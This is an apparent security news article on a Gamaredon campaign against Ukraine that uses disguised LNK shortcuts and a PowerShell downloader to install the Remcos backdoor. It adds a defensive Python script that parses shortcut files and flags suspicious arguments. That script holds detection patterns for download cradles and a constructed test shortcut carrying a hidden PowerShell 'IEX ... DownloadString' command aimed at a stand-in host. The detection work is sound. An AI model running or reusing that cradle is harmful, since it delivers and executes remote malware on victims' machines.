The Cisco Talos threat intelligence team has detailed an ongoing campaign targeting users in Ukraine, which has been active since at least November 2024.
The campaign leverages malicious LNK files that run a PowerShell downloader, leading to the installation of the Remcos backdoor. The campaign is believed to be linked to the notorious Gamaredon threat actor (aka Primitive Bear, Armageddon, UNC530, ACTINIUM, or Aqua Blizzard), a suspected Russian cyber espionage group that has targeted military, NGO, judiciary, law enforcement, and non-profit organizations in Ukraine since at least 2013.
The malicious LNK files are disguised as legitimate files, with filenames using Russian terms related to military movements in Ukraine to lure victims into opening the files, which are often delivered in phishing emails.
Upon execution, the LNK file activates a PowerShell downloader that contacts geo-fenced servers located in Russia and Germany. The downloader retrieves a second-stage ZIP file containing the Remcos backdoor, which is then executed using a DLL side-loading technique. The backdoor gives attackers the ability to remotely control compromised machines.
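The first link in that chain, a Windows shortcut whose target is a PowerShell download cradle rather than the document its name and icon suggest, is something a defender can check for directly in the shortcut's binary structure. The following Python script is an added example, not Talos code and not anything recovered from this campaign: it parses the fixed 76-byte Shell Link header and the StringData block of a .LNK file, then applies generic heuristics (PowerShell target, download and in-memory-execution keywords in the arguments, a minimized window on launch, a document-application icon on a script launcher). The two sample shortcuts are constructed inline for the demonstration; the patterns are illustrative choices, not the indicators Talos published.

```python
import re
import struct

# Shell Link header constants (MS-SHLLINK). The CLSID is fixed for every .LNK file.
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits that govern which optional structures follow the header.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
# StringData entries appear in exactly this order when their flag bit is set.
STRING_FIELDS = (
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that starts the target minimized

# Heuristic patterns for a PowerShell download cradle in COMMAND_LINE_ARGUMENTS.
# These are generic example indicators (assumption), not Talos IoCs for this campaign.
SUSPICIOUS_ARG_PATTERNS = {
    "download cradle": r"download(string|file|data)|invoke-webrequest|\biwr\b",
    "in-memory execution": r"\biex\b|invoke-expression",
    "encoded command": r"-e(nc|ncodedcommand)?\s",
    "execution policy bypass": r"-e(xecution)?p(olicy)?\s+bypass",
    "hidden window": r"-w(indowstyle)?\s+hidden",
    "remote URL": r"https?://",
}
DOCUMENT_ICON_HOSTS = ("winword", "excel", "powerpnt", "wordpad", "acrord")


def parse_lnk(data):
    """Parse header fields and StringData from a .LNK byte string."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE \
            or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags, = struct.unpack_from("<I", data, 20)
    show_cmd, = struct.unpack_from("<I", data, 60)
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:        # IDListSize (u16) + item IDs: skip
        size, = struct.unpack_from("<H", data, pos)
        pos += 2 + size
    if flags & HAS_LINK_INFO:                  # LinkInfoSize (u32) includes itself: skip
        size, = struct.unpack_from("<I", data, pos)
        pos += size
    link = {"flags": flags, "show_command": show_cmd}
    for bit, name in STRING_FIELDS:            # CountCharacters (u16) + string, no terminator
        if flags & bit:
            count, = struct.unpack_from("<H", data, pos)
            pos += 2
            if flags & IS_UNICODE:
                link[name] = data[pos:pos + count * 2].decode("utf-16-le")
                pos += count * 2
            else:
                link[name] = data[pos:pos + count].decode("latin-1")
                pos += count
    return link


def assess_lnk(data):
    """Return human-readable findings for a shortcut; an empty list means nothing flagged."""
    link = parse_lnk(data)
    findings = []
    target = (link.get("relative_path", "") + " " + link.get("arguments", "")).lower()
    runs_powershell = "powershell" in target or "pwsh" in target
    if runs_powershell:
        findings.append("target launches PowerShell")
    args = link.get("arguments", "").lower()
    for label, pattern in SUSPICIOUS_ARG_PATTERNS.items():
        if re.search(pattern, args):
            findings.append(f"arguments: {label}")
    if link["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand hides the console window (SW_SHOWMINNOACTIVE)")
    icon = link.get("icon_location", "").lower()
    if runs_powershell and any(app in icon for app in DOCUMENT_ICON_HOSTS):
        findings.append("document-application icon on a PowerShell launcher (masquerade)")
    return findings


def build_lnk(relative_path, arguments=None, icon_location=None, show_command=1):
    """Construct a minimal .LNK byte string (constructed test data, not a captured sample)."""
    flags = HAS_RELATIVE_PATH | IS_UNICODE
    strings = [relative_path]
    if arguments is not None:
        flags |= HAS_ARGUMENTS
        strings.append(arguments)
    if icon_location is not None:
        flags |= HAS_ICON_LOCATION
        strings.append(icon_location)
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in strings)
    return header + body


# Constructed samples: a script launcher dressed up as a document, and a plain notepad shortcut.
MALICIOUS_SAMPLE = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-w hidden -nop -ep bypass -c IEX((New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage'))",
    r"%ProgramFiles%\Microsoft Office\root\Office16\WINWORD.EXE",
    show_command=SW_SHOWMINNOACTIVE,
)
BENIGN_SAMPLE = build_lnk(r"..\..\..\Windows\System32\notepad.exe")

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, assess_lnk(sample) or ["no findings"])
```

The parser only reads the header and StringData, which is where the launch command lives; it skips the LinkTargetIDList and LinkInfo structures rather than interpreting them, so a shortcut whose target is expressed only through the ID list (with no RELATIVE_PATH string) will show an empty path and should be escalated to a fuller parser rather than treated as clean.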
The LNK files in this campaign bear similarities to those seen in past Gamaredon operations, which have consistently involved the use of ZIP archives and the distribution of malicious files disguised as documents related to the ongoing conflict in Ukraine.
While Talos has not pinpointed the exact method by which the malicious LNK files are distributed, it is likely that Gamaredon continues to rely on phishing emails. The emails may either carry the ZIP file as an attachment or contain a URL pointing to a remote download location. The attacks are localized: the servers hosting the malicious payloads and decoy documents serve them only to Ukraine-based victims.
Notably, Talos observed that every server used in this campaign returned an HTTP 403 error when the researchers attempted to download the payload, indicating that the servers may have been taken offline or geo-fenced to certain regions.
However, evidence suggests that the malicious servers were still hosting payloads for select regions at the time of the investigation. The servers were primarily hosted by two Internet Service Providers (ISPs): GTHost and HyperHosting. In addition to hosting the malicious files, at least one of these servers has been identified as functioning as the command-and-control (C2) server for the Remcos backdoor.
The Remcos backdoor gives the attacker full control over the infected machine, allowing them to steal data, execute arbitrary commands, and maintain persistence within the compromised network.